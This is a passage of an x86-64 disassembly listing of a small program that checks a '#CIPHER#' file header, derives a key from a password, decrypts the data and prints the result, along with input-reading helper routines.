| 4015a0: e8 0b f8 ff ff callq 400db0 644 | 4015a5: 48 3d 00 40 00 00 cmp $0x4000,%rax 645 | 4015ab: 0f 85 a5 00 00 00 jne 401656 646 | 4015b1: 39 6c 24 18 cmp %ebp,0x18(%rsp) 647 | 4015b5: 75 0c jne 4015c3 648 | 4015b7: 48 8b 44 24 08 mov 0x8(%rsp),%rax 649 | 4015bc: 0f 10 00 movups (%rax),%xmm0 650 | 4015bf: 41 0f 11 07 movups %xmm0,(%r15) 651 | 4015c3: ba 00 40 00 00 mov $0x4000,%edx 652 | 4015c8: 44 89 e7 mov %r12d,%edi 653 | 4015cb: 4c 89 fe mov %r15,%rsi 654 | 4015ce: e8 5d f9 ff ff callq 400f30 655 | 4015d3: 48 3d 00 40 00 00 cmp $0x4000,%rax 656 | 4015d9: 75 7b jne 401656 657 | 4015db: 8b 4c 24 20 mov 0x20(%rsp),%ecx 658 | 4015df: ff c1 inc %ecx 659 | 4015e1: 89 4c 24 20 mov %ecx,0x20(%rsp) 660 | 4015e5: 8d 45 01 lea 0x1(%rbp),%eax 661 | 4015e8: 83 c5 bf add $0xffffffbf,%ebp 662 | 4015eb: 3b 6c 24 14 cmp 0x14(%rsp),%ebp 663 | 4015ef: 89 c5 mov %eax,%ebp 664 | 4015f1: 7c a1 jl 401594 665 | 4015f3: 48 8b 04 24 mov (%rsp),%rax 666 | 4015f7: 48 ff c0 inc %rax 667 | 4015fa: 83 f8 17 cmp $0x17,%eax 668 | 4015fd: 0f 8c 63 ff ff ff jl 401566 669 | 401603: 81 f9 55 02 00 00 cmp $0x255,%ecx 670 | 401609: 7f 48 jg 401653 671 | 40160b: 41 bd ff ff ff ff mov $0xffffffff,%r13d 672 | 401611: ba 00 40 00 00 mov $0x4000,%edx 673 | 401616: 8b 7c 24 1c mov 0x1c(%rsp),%edi 674 | 40161a: 4c 89 fe mov %r15,%rsi 675 | 40161d: e8 8e f7 ff ff callq 400db0 676 | 401622: 48 3d 00 40 00 00 cmp $0x4000,%rax 677 | 401628: 75 2c jne 401656 678 | 40162a: ba 00 40 00 00 mov $0x4000,%edx 679 | 40162f: 44 89 e7 mov %r12d,%edi 680 | 401632: 4c 89 fe mov %r15,%rsi 681 | 401635: e8 f6 f8 ff ff callq 400f30 682 | 40163a: 48 3d 00 40 00 00 cmp $0x4000,%rax 683 | 401640: 75 14 jne 401656 684 | 401642: 8b 44 24 20 mov 0x20(%rsp),%eax 685 | 401646: ff c0 inc %eax 686 | 401648: 3d 56 02 00 00 cmp $0x256,%eax 687 | 40164d: 89 44 24 20 mov %eax,0x20(%rsp) 688 | 401651: 7c be jl 401611 689 | 401653: 45 31 ed xor %r13d,%r13d 690 | 401656: 8b 7c 24 1c mov 0x1c(%rsp),%edi 691 | 40165a: e8 f1 f6 ff ff callq 400d50 692 | 40165f: eb 09 jmp 40166a 693 | 401661: 45 31 ff xor %r15d,%r15d 694 | 401664: 41 bc ff ff ff ff mov $0xffffffff,%r12d 695 | 40166a: 0f 57 c0 xorps %xmm0,%xmm0 696 | 40166d: 0f 29 84 24 70 01 00 movaps %xmm0,0x170(%rsp) 697 | 401674: 00 698 | 401675: 0f 29 84 24 60 01 00 movaps %xmm0,0x160(%rsp) 699 | 40167c: 00 700 | 40167d: 0f 29 84 24 50 01 00 movaps %xmm0,0x150(%rsp) 701 | 401684: 00 702 | 401685: 0f 29 84 24 40 01 00 movaps %xmm0,0x140(%rsp) 703 | 40168c: 00 704 | 40168d: 0f 29 84 24 30 01 00 movaps %xmm0,0x130(%rsp) 705 | 401694: 00 706 | 401695: 0f 29 84 24 20 01 00 movaps %xmm0,0x120(%rsp) 707 | 40169c: 00 708 | 40169d: 0f 29 84 24 10 01 00 movaps %xmm0,0x110(%rsp) 709 | 4016a4: 00 710 | 4016a5: 0f 29 84 24 00 01 00 movaps %xmm0,0x100(%rsp) 711 | 4016ac: 00 712 | 4016ad: 0f 29 84 24 f0 00 00 movaps %xmm0,0xf0(%rsp) 713 | 4016b4: 00 714 | 4016b5: 0f 29 84 24 e0 00 00 movaps %xmm0,0xe0(%rsp) 715 | 4016bc: 00 716 | 4016bd: 0f 29 84 24 d0 00 00 movaps %xmm0,0xd0(%rsp) 717 | 4016c4: 00 718 | 4016c5: 48 85 db test %rbx,%rbx 719 | 4016c8: 74 08 je 4016d2 720 | 4016ca: 48 89 df mov %rbx,%rdi 721 | 4016cd: e8 3e f7 ff ff callq 400e10 722 | 4016d2: 4d 85 ff test %r15,%r15 723 | 4016d5: 74 08 je 4016df 724 | 4016d7: 4c 89 ff mov %r15,%rdi 725 | 4016da: e8 31 f7 ff ff callq 400e10 726 | 4016df: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 727 | 4016e4: e8 f7 f7 ff ff callq 400ee0 728 | 4016e9: 45 85 e4 test %r12d,%r12d 729 | 4016ec: 78 08 js 4016f6 730 | 4016ee: 44 89 e7 mov %r12d,%edi 731 | 4016f1: e8 5a f6 ff ff callq 400d50 732 | 4016f6: 31 c0 xor %eax,%eax 733 | 4016f8: 45 85 ed test %r13d,%r13d 734 | 4016fb: 74 15 je 401712 735 | 4016fd: 4c 89 f7 mov %r14,%rdi 736 | 401700: e8 db f6 ff ff callq 400de0 737 | 401705: bf f4 1e 40 00 mov $0x401ef4,%edi 738 | 40170a: e8 61 f6 ff ff callq 400d70 739 | 40170f: 44 89 e8 mov %r13d,%eax 740 | 401712: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 741 | 401719: 00 00 742 | 40171b: 48 3b 8c 24 b0 01 00 cmp 0x1b0(%rsp),%rcx 743 | 401722: 00 744 | 401723: 75 1f jne 401744 745 | 401725: 48 81 c4 b8 01 00 00 add $0x1b8,%rsp 746 | 40172c: 5b pop %rbx 747 | 40172d: 41 5c pop %r12 748 | 40172f: 41 5d pop %r13 749 | 401731: 41 5e pop %r14 750 | 401733: 41 5f pop %r15 751 | 401735: 5d pop %rbp 752 | 401736: c3 retq 753 | 401737: 31 db xor %ebx,%ebx 754 | 401739: 41 bc ff ff ff ff mov $0xffffffff,%r12d 755 | 40173f: e9 26 ff ff ff jmpq 40166a 756 | 401744: e8 57 f7 ff ff callq 400ea0 <__stack_chk_fail@plt> 757 | 401749: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 758 | 401750: 55 push %rbp 759 | 401751: 41 57 push %r15 760 | 401753: 41 56 push %r14 761 | 401755: 41 55 push %r13 762 | 401757: 41 54 push %r12 763 | 401759: 53 push %rbx 764 | 40175a: 48 81 ec a8 02 00 00 sub $0x2a8,%rsp 765 | 401761: 48 89 f5 mov %rsi,%rbp 766 | 401764: 48 89 fb mov %rdi,%rbx 767 | 401767: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 768 | 40176e: 00 00 769 | 401770: 48 89 84 24 a0 02 00 mov %rax,0x2a0(%rsp) 770 | 401777: 00 771 | 401778: 48 8d 54 24 20 lea 0x20(%rsp),%rdx 772 | 40177d: bf 01 00 00 00 mov $0x1,%edi 773 | 401782: e8 a9 f6 ff ff callq 400e30 <__xstat@plt> 774 | 401787: 85 c0 test %eax,%eax 775 | 401789: 0f 85 16 03 00 00 jne 401aa5 776 | 40178f: 48 81 7c 24 50 50 80 cmpq $0x958050,0x50(%rsp) 777 | 401796: 95 00 778 | 401798: 0f 85 07 03 00 00 jne 401aa5 779 | 40179e: 48 8d bc 24 b8 00 00 lea 0xb8(%rsp),%rdi 780 | 4017a5: 00 781 | 4017a6: e8 f5 f5 ff ff callq 400da0 782 | 4017ab: 48 8d b4 24 e0 01 00 lea 0x1e0(%rsp),%rsi 783 | 4017b2: 00 784 | 4017b3: 48 89 df mov %rbx,%rdi 785 | 4017b6: e8 95 f8 ff ff callq 401050 786 | 4017bb: 31 db xor %ebx,%ebx 787 | 4017bd: 85 c0 test %eax,%eax 788 | 4017bf: 41 bc ff ff ff ff mov $0xffffffff,%r12d 789 | 4017c5: 0f 85 12 03 00 00 jne 401add 790 | 4017cb: bf 00 02 00 00 mov $0x200,%edi 791 | 4017d0: e8 eb f5 ff ff callq 400dc0 792 | 4017d5: 48 89 c3 mov %rax,%rbx 793 | 4017d8: 45 31 f6 xor %r14d,%r14d 794 | 4017db: 48 85 db test %rbx,%rbx 795 | 4017de: 0f 84 c6 03 00 00 je 401baa 796 | 4017e4: bf 00 02 00 00 mov $0x200,%edi 797 | 4017e9: e8 d2 f5 ff ff callq 400dc0 798 | 4017ee: 49 89 c6 mov %rax,%r14 799 | 4017f1: 4d 85 f6 test %r14,%r14 800 | 4017f4: 0f 84 e3 02 00 00 je 401add 801 | 4017fa: 31 f6 xor %esi,%esi 802 | 4017fc: 31 c0 xor %eax,%eax 803 | 4017fe: 48 89 ef mov %rbp,%rdi 804 | 401801: e8 3a f7 ff ff callq 400f40 805 | 401806: 89 c5 mov %eax,%ebp 806 | 401808: 85 ed test %ebp,%ebp 807 | 40180a: 0f 88 d5 02 00 00 js 401ae5 808 | 401810: 48 8d b4 24 50 02 00 lea 0x250(%rsp),%rsi 809 | 401817: 00 810 | 401818: ba 08 00 00 00 mov $0x8,%edx 811 | 40181d: 89 ef mov %ebp,%edi 812 | 40181f: e8 8c f5 ff ff callq 400db0 813 | 401824: 48 83 f8 08 cmp $0x8,%rax 814 | 401828: 0f 85 b7 02 00 00 jne 401ae5 815 | 40182e: 48 b8 23 43 49 50 48 movabs $0x2352454850494323,%rax 816 | 401835: 45 52 23 817 | 401838: 48 39 84 24 50 02 00 cmp %rax,0x250(%rsp) 818 | 40183f: 00 819 | 401840: 0f 85 9f 02 00 00 jne 401ae5 820 | 401846: 48 8d b4 24 00 02 00 lea 0x200(%rsp),%rsi 821 | 40184d: 00 822 | 40184e: ba 08 00 00 00 mov $0x8,%edx 823 | 401853: 89 ef mov %ebp,%edi 824 | 401855: e8 56 f5 ff ff callq 400db0 825 | 40185a: 48 83 f8 08 cmp $0x8,%rax 826 | 40185e: 0f 85 81 02 00 00 jne 401ae5 827 | 401864: e8 97 f6 ff ff callq 400f00 828 | 401869: 49 89 c7 mov %rax,%r15 829 | 40186c: e8 9f f6 ff ff callq 400f10 830 | 401871: 48 8d 8c 24 20 02 00 lea 0x220(%rsp),%rcx 831 | 401878: 00 832 | 401879: 48 89 4c 24 08 mov %rcx,0x8(%rsp) 833 | 40187e: 48 8d 8c 24 30 02 00 lea 0x230(%rsp),%rcx 834 | 401885: 00 835 | 401886: 48 89 0c 24 mov %rcx,(%rsp) 836 | 40188a: 48 8d 94 24 00 02 00 lea 0x200(%rsp),%rdx 837 | 401891: 00 838 | 401892: 48 8d 8c 24 e0 01 00 lea 0x1e0(%rsp),%rcx 839 | 401899: 00 840 | 40189a: 41 b8 17 00 00 00 mov $0x17,%r8d 841 | 4018a0: 41 b9 07 00 00 00 mov $0x7,%r9d 842 | 4018a6: 4c 89 ff mov %r15,%rdi 843 | 4018a9: 48 89 c6 mov %rax,%rsi 844 | 4018ac: e8 df f4 ff ff callq 400d90 845 | 4018b1: 83 f8 20 cmp $0x20,%eax 846 | 4018b4: 0f 85 fc 02 00 00 jne 401bb6 847 | 4018ba: 48 8b 84 24 ef 01 00 mov 0x1ef(%rsp),%rax 848 | 4018c1: 00 849 | 4018c2: 48 89 84 24 7f 02 00 mov %rax,0x27f(%rsp) 850 | 4018c9: 00 851 | 4018ca: 0f 28 84 24 e0 01 00 movaps 0x1e0(%rsp),%xmm0 852 | 4018d1: 00 853 | 4018d2: 0f 29 84 24 70 02 00 movaps %xmm0,0x270(%rsp) 854 | 4018d9: 00 855 | 4018da: 48 8b 84 24 00 02 00 mov 0x200(%rsp),%rax 856 | 4018e1: 00 857 | 4018e2: 48 89 84 24 87 02 00 mov %rax,0x287(%rsp) 858 | 4018e9: 00 859 | 4018ea: 48 8d bc 24 70 02 00 lea 0x270(%rsp),%rdi 860 | 4018f1: 00 861 | 4018f2: 48 8d 94 24 a0 01 00 lea 0x1a0(%rsp),%rdx 862 | 4018f9: 00 863 | 4018fa: be 1f 00 00 00 mov $0x1f,%esi 864 | 4018ff: e8 6c f5 ff ff callq 400e70 865 | 401904: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 866 | 40190b: 00 867 | 40190c: ba 40 00 00 00 mov $0x40,%edx 868 | 401911: 89 ef mov %ebp,%edi 869 | 401913: e8 98 f4 ff ff callq 400db0 870 | 401918: 48 83 f8 40 cmp $0x40,%rax 871 | 40191c: 0f 85 c3 01 00 00 jne 401ae5 872 | 401922: 48 8d bc 24 a0 01 00 lea 0x1a0(%rsp),%rdi 873 | 401929: 00 874 | 40192a: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 875 | 401931: 00 876 | 401932: ba 40 00 00 00 mov $0x40,%edx 877 | 401937: e8 94 f5 ff ff callq 400ed0 878 | 40193c: 85 c0 test %eax,%eax 879 | 40193e: 0f 85 a1 01 00 00 jne 401ae5 880 | 401944: c7 84 24 b4 00 00 00 movl $0x0,0xb4(%rsp) 881 | 40194b: 00 00 00 00 882 | 40194f: 45 31 ed xor %r13d,%r13d 883 | 401952: 48 89 de mov %rbx,%rsi 884 | 401955: 45 31 ff xor %r15d,%r15d 885 | 401958: 48 89 74 24 10 mov %rsi,0x10(%rsp) 886 | 40195d: 42 0f b6 84 3c e0 01 movzbl 0x1e0(%rsp,%r15,1),%eax 887 | 401964: 00 00 888 | 401966: 46 8d 6c 28 bf lea -0x41(%rax,%r13,1),%r13d 889 | 40196b: 44 89 ac 24 b4 00 00 mov %r13d,0xb4(%rsp) 890 | 401972: 00 891 | 401973: 44 89 e8 mov %r13d,%eax 892 | 401976: c1 e0 0e shl $0xe,%eax 893 | 401979: 83 c8 50 or $0x50,%eax 894 | 40197c: 48 63 c8 movslq %eax,%rcx 895 | 40197f: ba 10 00 00 00 mov $0x10,%edx 896 | 401984: 89 ef mov %ebp,%edi 897 | 401986: e8 d5 f4 ff ff callq 400e60 898 | 40198b: 48 83 f8 10 cmp $0x10,%rax 899 | 40198f: 0f 85 50 01 00 00 jne 401ae5 900 | 401995: 41 ff c5 inc %r13d 901 | 401998: 44 89 ac 24 b4 00 00 mov %r13d,0xb4(%rsp) 902 | 40199f: 00 903 | 4019a0: 49 ff c7 inc %r15 904 | 4019a3: 48 8b 74 24 10 mov 0x10(%rsp),%rsi 905 | 4019a8: 48 83 c6 10 add $0x10,%rsi 906 | 4019ac: 41 83 ff 17 cmp $0x17,%r15d 907 | 4019b0: 7c a6 jl 401958 908 | 4019b2: e8 49 f5 ff ff callq 400f00 909 | 4019b7: 48 8d 8c 24 b8 00 00 lea 0xb8(%rsp),%rcx 910 | 4019be: 00 911 | 4019bf: 4c 8d 84 24 30 02 00 lea 0x230(%rsp),%r8 912 | 4019c6: 00 913 | 4019c7: 4c 8d 8c 24 20 02 00 lea 0x220(%rsp),%r9 914 | 4019ce: 00 915 | 4019cf: 31 d2 xor %edx,%edx 916 | 4019d1: 48 89 cf mov %rcx,%rdi 917 | 4019d4: 48 89 c6 mov %rax,%rsi 918 | 4019d7: 4c 89 c1 mov %r8,%rcx 919 | 4019da: 4d 89 c8 mov %r9,%r8 920 | 4019dd: e8 5e f4 ff ff callq 400e40 921 | 4019e2: 85 c0 test %eax,%eax 922 | 4019e4: 0f 84 fb 00 00 00 je 401ae5 923 | 4019ea: 48 8d 84 24 b8 00 00 lea 0xb8(%rsp),%rax 924 | 4019f1: 00 925 | 4019f2: 48 8d 4c 24 1c lea 0x1c(%rsp),%rcx 926 | 4019f7: 41 b8 70 01 00 00 mov $0x170,%r8d 927 | 4019fd: 48 89 c7 mov %rax,%rdi 928 | 401a00: 4c 89 f6 mov %r14,%rsi 929 | 401a03: 48 89 ca mov %rcx,%rdx 930 | 401a06: 48 89 d9 mov %rbx,%rcx 931 | 401a09: e8 e2 f4 ff ff callq 400ef0 932 | 401a0e: 85 c0 test %eax,%eax 933 | 401a10: 0f 84 cf 00 00 00 je 401ae5 934 | 401a16: 48 63 44 24 1c movslq 0x1c(%rsp),%rax 935 | 401a1b: 4c 01 f0 add %r14,%rax 936 | 401a1e: 48 8d 8c 24 b8 00 00 lea 0xb8(%rsp),%rcx 937 | 401a25: 00 938 | 401a26: 48 8d 94 24 b4 00 00 lea 0xb4(%rsp),%rdx 939 | 401a2d: 00 940 | 401a2e: 48 89 cf mov %rcx,%rdi 941 | 401a31: 48 89 c6 mov %rax,%rsi 942 | 401a34: e8 77 f4 ff ff callq 400eb0 943 | 401a39: 85 c0 test %eax,%eax 944 | 401a3b: 0f 84 a4 00 00 00 je 401ae5 945 | 401a41: 8b 44 24 1c mov 0x1c(%rsp),%eax 946 | 401a45: 03 84 24 b4 00 00 00 add 0xb4(%rsp),%eax 947 | 401a4c: 3d 70 01 00 00 cmp $0x170,%eax 948 | 401a51: 89 44 24 1c mov %eax,0x1c(%rsp) 949 | 401a55: 0f 85 8a 00 00 00 jne 401ae5 950 | 401a5b: 48 8b 05 ee 16 20 00 mov 0x2016ee(%rip),%rax # 603150 951 | 401a62: 48 89 c7 mov %rax,%rdi 952 | 401a65: e8 e6 f4 ff ff callq 400f50 953 | 401a6a: 45 31 ff xor %r15d,%r15d 954 | 401a6d: 43 80 3c 3e 00 cmpb $0x0,(%r14,%r15,1) 955 | 401a72: 74 22 je 401a96 956 | 401a74: 4b 8d 04 3e lea (%r14,%r15,1),%rax 957 | 401a78: bf 01 00 00 00 mov $0x1,%edi 958 | 401a7d: ba 01 00 00 00 mov $0x1,%edx 959 | 401a82: 48 89 c6 mov %rax,%rsi 960 | 401a85: e8 a6 f4 ff ff callq 400f30 961 | 401a8a: 49 ff c7 inc %r15 962 | 401a8d: 41 81 ff 70 01 00 00 cmp $0x170,%r15d 963 | 401a94: 7c d7 jl 401a6d 964 | 401a96: bf 0a 00 00 00 mov $0xa,%edi 965 | 401a9b: e8 e0 f2 ff ff callq 400d80 966 | 401aa0: 45 31 e4 xor %r12d,%r12d 967 | 401aa3: eb 40 jmp 401ae5 968 | 401aa5: bf f4 1e 40 00 mov $0x401ef4,%edi 969 | 401aaa: e8 c1 f2 ff ff callq 400d70 970 | 401aaf: b8 ff ff ff ff mov $0xffffffff,%eax 971 | 401ab4: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 972 | 401abb: 00 00 973 | 401abd: 48 3b 8c 24 a0 02 00 cmp 0x2a0(%rsp),%rcx 974 | 401ac4: 00 975 | 401ac5: 0f 85 fa 00 00 00 jne 401bc5 976 | 401acb: 48 81 c4 a8 02 00 00 add $0x2a8,%rsp 977 | 401ad2: 5b pop %rbx 978 | 401ad3: 41 5c pop %r12 979 | 401ad5: 41 5d pop %r13 980 | 401ad7: 41 5e pop %r14 981 | 401ad9: 41 5f pop %r15 982 | 401adb: 5d pop %rbp 983 | 401adc: c3 retq 984 | 401add: bd ff ff ff ff mov $0xffffffff,%ebp 985 | 401ae2: 45 31 f6 xor %r14d,%r14d 986 | 401ae5: 0f 57 c0 xorps %xmm0,%xmm0 987 | 401ae8: 0f 29 84 24 40 02 00 movaps %xmm0,0x240(%rsp) 988 | 401aef: 00 989 | 401af0: 0f 29 84 24 30 02 00 movaps %xmm0,0x230(%rsp) 990 | 401af7: 00 991 | 401af8: 0f 29 84 24 20 02 00 movaps %xmm0,0x220(%rsp) 992 | 401aff: 00 993 | 401b00: 0f 29 84 24 10 02 00 movaps %xmm0,0x210(%rsp) 994 | 401b07: 00 995 | 401b08: 0f 29 84 24 00 02 00 movaps %xmm0,0x200(%rsp) 996 | 401b0f: 00 997 | 401b10: 0f 29 84 24 f0 01 00 movaps %xmm0,0x1f0(%rsp) 998 | 401b17: 00 999 | 401b18: 0f 29 84 24 e0 01 00 movaps %xmm0,0x1e0(%rsp) 1000 | 401b1f: 00 1001 | 401b20: 0f 29 84 24 d0 01 00 movaps %xmm0,0x1d0(%rsp) 1002 | 401b27: 00 1003 | 401b28: 0f 29 84 24 c0 01 00 movaps %xmm0,0x1c0(%rsp) 1004 | 401b2f: 00 1005 | 401b30: 0f 29 84 24 b0 01 00 movaps %xmm0,0x1b0(%rsp) 1006 | 401b37: 00 1007 | 401b38: 0f 29 84 24 a0 01 00 movaps %xmm0,0x1a0(%rsp) 1008 | 401b3f: 00 1009 | 401b40: 0f 29 84 24 90 01 00 movaps %xmm0,0x190(%rsp) 1010 | 401b47: 00 1011 | 401b48: 0f 29 84 24 80 01 00 movaps %xmm0,0x180(%rsp) 1012 | 401b4f: 00 1013 | 401b50: 0f 29 84 24 70 01 00 movaps %xmm0,0x170(%rsp) 1014 | 401b57: 00 1015 | 401b58: 0f 29 84 24 60 01 00 movaps %xmm0,0x160(%rsp) 1016 | 401b5f: 00 1017 | 401b60: 48 85 db test %rbx,%rbx 1018 | 401b63: 74 10 je 401b75 1019 | 401b65: 48 89 df mov %rbx,%rdi 1020 | 401b68: e8 a3 f2 ff ff callq 400e10 1021 | 401b6d: 4c 89 f7 mov %r14,%rdi 1022 | 401b70: e8 9b f2 ff ff callq 400e10 1023 | 401b75: 48 8d bc 24 b8 00 00 lea 0xb8(%rsp),%rdi 1024 | 401b7c: 00 1025 | 401b7d: e8 5e f3 ff ff callq 400ee0 1026 | 401b82: 85 ed test %ebp,%ebp 1027 | 401b84: 78 07 js 401b8d 1028 | 401b86: 89 ef mov %ebp,%edi 1029 | 401b88: e8 c3 f1 ff ff callq 400d50 1030 | 401b8d: 31 c0 xor %eax,%eax 1031 | 401b8f: 45 85 e4 test %r12d,%r12d 1032 | 401b92: 0f 84 1c ff ff ff je 401ab4 1033 | 401b98: bf f4 1e 40 00 mov $0x401ef4,%edi 1034 | 401b9d: e8 ce f1 ff ff callq 400d70 1035 | 401ba2: 44 89 e0 mov %r12d,%eax 1036 | 401ba5: e9 0a ff ff ff jmpq 401ab4 1037 | 401baa: bd ff ff ff ff mov $0xffffffff,%ebp 1038 | 401baf: 31 db xor %ebx,%ebx 1039 | 401bb1: e9 2f ff ff ff jmpq 401ae5 1040 | 401bb6: bf f4 1e 40 00 mov $0x401ef4,%edi 1041 | 401bbb: e8 b0 f1 ff ff callq 400d70 1042 | 401bc0: e9 20 ff ff ff jmpq 401ae5 1043 | 401bc5: e8 d6 f2 ff ff callq 400ea0 <__stack_chk_fail@plt> 1044 | 401bca: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 1045 | 401bd0: 53 push %rbx 1046 | 401bd1: 48 83 ec 10 sub $0x10,%rsp 1047 | 401bd5: 48 89 fb mov %rdi,%rbx 1048 | 401bd8: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1049 | 401bdf: 00 00 1050 | 401be1: 48 89 44 24 08 mov %rax,0x8(%rsp) 1051 | 401be6: 48 8b 15 53 15 20 00 mov 0x201553(%rip),%rdx # 603140 1052 | 401bed: e8 0e f2 ff ff callq 400e00 1053 | 401bf2: 48 89 df mov %rbx,%rdi 1054 | 401bf5: e8 26 f2 ff ff callq 400e20 1055 | 401bfa: 85 c0 test %eax,%eax 1056 | 401bfc: 7e 1f jle 401c1d 1057 | 401bfe: 48 c1 e0 20 shl $0x20,%rax 1058 | 401c02: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1059 | 401c09: ff ff ff 1060 | 401c0c: 48 01 c1 add %rax,%rcx 1061 | 401c0f: 48 c1 f9 20 sar $0x20,%rcx 1062 | 401c13: 80 3c 0b 0a cmpb $0xa,(%rbx,%rcx,1) 1063 | 401c17: 75 04 jne 401c1d 1064 | 401c19: c6 04 0b 00 movb $0x0,(%rbx,%rcx,1) 1065 | 401c1d: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1066 | 401c24: 00 00 1067 | 401c26: 48 3b 44 24 08 cmp 0x8(%rsp),%rax 1068 | 401c2b: 75 08 jne 401c35 1069 | 401c2d: 31 c0 xor %eax,%eax 1070 | 401c2f: 48 83 c4 10 add $0x10,%rsp 1071 | 401c33: 5b pop %rbx 1072 | 401c34: c3 retq 1073 | 401c35: e8 66 f2 ff ff callq 400ea0 <__stack_chk_fail@plt> 1074 | 401c3a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 1075 | 401c40: 53 push %rbx 1076 | 401c41: 48 81 ec 70 02 00 00 sub $0x270,%rsp 1077 | 401c48: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1078 | 401c4f: 00 00 1079 | 401c51: 48 89 84 24 68 02 00 mov %rax,0x268(%rsp) 1080 | 401c58: 00 1081 | 401c59: bf 52 1f 40 00 mov $0x401f52,%edi 1082 | 401c5e: e8 0d f1 ff ff callq 400d70 1083 | 401c63: 48 8b 15 d6 14 20 00 mov 0x2014d6(%rip),%rdx # 603140 1084 | 401c6a: 48 8d 1c 24 lea (%rsp),%rbx 1085 | 401c6e: be 90 01 00 00 mov $0x190,%esi 1086 | 401c73: 48 89 df mov %rbx,%rdi 1087 | 401c76: e8 85 f1 ff ff callq 400e00 1088 | 401c7b: 48 89 df mov %rbx,%rdi 1089 | 401c7e: e8 9d f1 ff ff callq 400e20 1090 | 401c83: 85 c0 test %eax,%eax 1091 | 401c85: 7e 1f jle 401ca6 1092 | 401c87: 48 c1 e0 20 shl $0x20,%rax 1093 | 401c8b: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1094 | 401c92: ff ff ff 1095 | 401c95: 48 01 c1 add %rax,%rcx 1096 | 401c98: 48 c1 f9 20 sar $0x20,%rcx 1097 | 401c9c: 80 3c 0c 0a cmpb $0xa,(%rsp,%rcx,1) 1098 | 401ca0: 75 04 jne 401ca6 1099 | 401ca2: c6 04 0c 00 movb $0x0,(%rsp,%rcx,1) 1100 | 401ca6: bf 71 1f 40 00 mov $0x401f71,%edi 1101 | 401cab: e8 c0 f0 ff ff callq 400d70 1102 | 401cb0: 48 8b 15 89 14 20 00 mov 0x201489(%rip),%rdx # 603140 1103 | 401cb7: 48 8d 9c 24 00 02 00 lea 0x200(%rsp),%rbx 1104 | 401cbe: 00 1105 | 401cbf: be 64 00 00 00 mov $0x64,%esi 1106 | 401cc4: 48 89 df mov %rbx,%rdi 1107 | 401cc7: e8 34 f1 ff ff callq 400e00 1108 | 401ccc: 48 89 df mov %rbx,%rdi 1109 | 401ccf: e8 4c f1 ff ff callq 400e20 1110 | 401cd4: 85 c0 test %eax,%eax 1111 | 401cd6: 7e 27 jle 401cff 1112 | 401cd8: 48 c1 e0 20 shl $0x20,%rax 1113 | 401cdc: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1114 | 401ce3: ff ff ff 1115 | 401ce6: 48 01 c1 add %rax,%rcx 1116 | 401ce9: 48 c1 f9 20 sar $0x20,%rcx 1117 | 401ced: 80 bc 0c 00 02 00 00 cmpb $0xa,0x200(%rsp,%rcx,1) 1118 | 401cf4: 0a 1119 | 401cf5: 75 08 jne 401cff 1120 | 401cf7: c6 84 0c 00 02 00 00 movb $0x0,0x200(%rsp,%rcx,1) 1121 | 401cfe: 00 1122 | 401cff: 80 3c 24 65 cmpb $0x65,(%rsp) 1123 | 401d03: 0f 85 ce 00 00 00 jne 401dd7 1124 | 401d09: bf 7b 1f 40 00 mov $0x401f7b,%edi 1125 | 401d0e: e8 5d f0 ff ff callq 400d70 1126 | 401d13: 48 8b 15 26 14 20 00 mov 0x201426(%rip),%rdx # 603140 1127 | 401d1a: 48 8d 9c 24 90 01 00 lea 0x190(%rsp),%rbx 1128 | 401d21: 00 1129 | 401d22: be 64 00 00 00 mov $0x64,%esi 1130 | 401d27: 48 89 df mov %rbx,%rdi 1131 | 401d2a: e8 d1 f0 ff ff callq 400e00 1132 | 401d2f: 48 89 df mov %rbx,%rdi 1133 | 401d32: e8 e9 f0 ff ff callq 400e20 1134 | 401d37: 85 c0 test %eax,%eax 1135 | 401d39: 7e 27 jle 401d62 1136 | 401d3b: 48 c1 e0 20 shl $0x20,%rax 1137 | 401d3f: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1138 | 401d46: ff ff ff 1139 | 401d49: 48 01 c1 add %rax,%rcx 1140 | 401d4c: 48 c1 f9 20 sar $0x20,%rcx 1141 | 401d50: 80 bc 0c 90 01 00 00 cmpb $0xa,0x190(%rsp,%rcx,1) 1142 | 401d57: 0a 1143 | 401d58: 75 08 jne 401d62 1144 | 401d5a: c6 84 0c 90 01 00 00 movb $0x0,0x190(%rsp,%rcx,1) 1145 | 401d61: 00 1146 | 401d62: bf 88 1f 40 00 mov $0x401f88,%edi 1147 | 401d67: e8 04 f0 ff ff callq 400d70 1148 | 401d6c: 48 8b 15 cd 13 20 00 mov 0x2013cd(%rip),%rdx # 603140 1149 | 401d73: 48 8d 1c 24 lea (%rsp),%rbx 1150 | 401d77: be 90 01 00 00 mov $0x190,%esi 1151 | 401d7c: 48 89 df mov %rbx,%rdi 1152 | 401d7f: e8 7c f0 ff ff callq 400e00 1153 | 401d84: 48 89 df mov %rbx,%rdi 1154 | 401d87: e8 94 f0 ff ff callq 400e20 1155 | 401d8c: 85 c0 test %eax,%eax 1156 | 401d8e: 7e 1f jle 401daf 1157 | 401d90: 48 c1 e0 20 shl $0x20,%rax 1158 | 401d94: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1159 | 401d9b: ff ff ff 1160 | 401d9e: 48 01 c1 add %rax,%rcx 1161 | 401da1: 48 c1 f9 20 sar $0x20,%rcx 1162 | 401da5: 80 3c 0c 0a cmpb $0xa,(%rsp,%rcx,1) 1163 | 401da9: 75 04 jne 401daf 1164 | 401dab: c6 04 0c 00 movb $0x0,(%rsp,%rcx,1) 1165 | 401daf: 48 8d 1c 24 lea (%rsp),%rbx 1166 | 401db3: 48 89 df mov %rbx,%rdi 1167 | 401db6: e8 65 f0 ff ff callq 400e20 1168 | 401dbb: 48 8d bc 24 00 02 00 lea 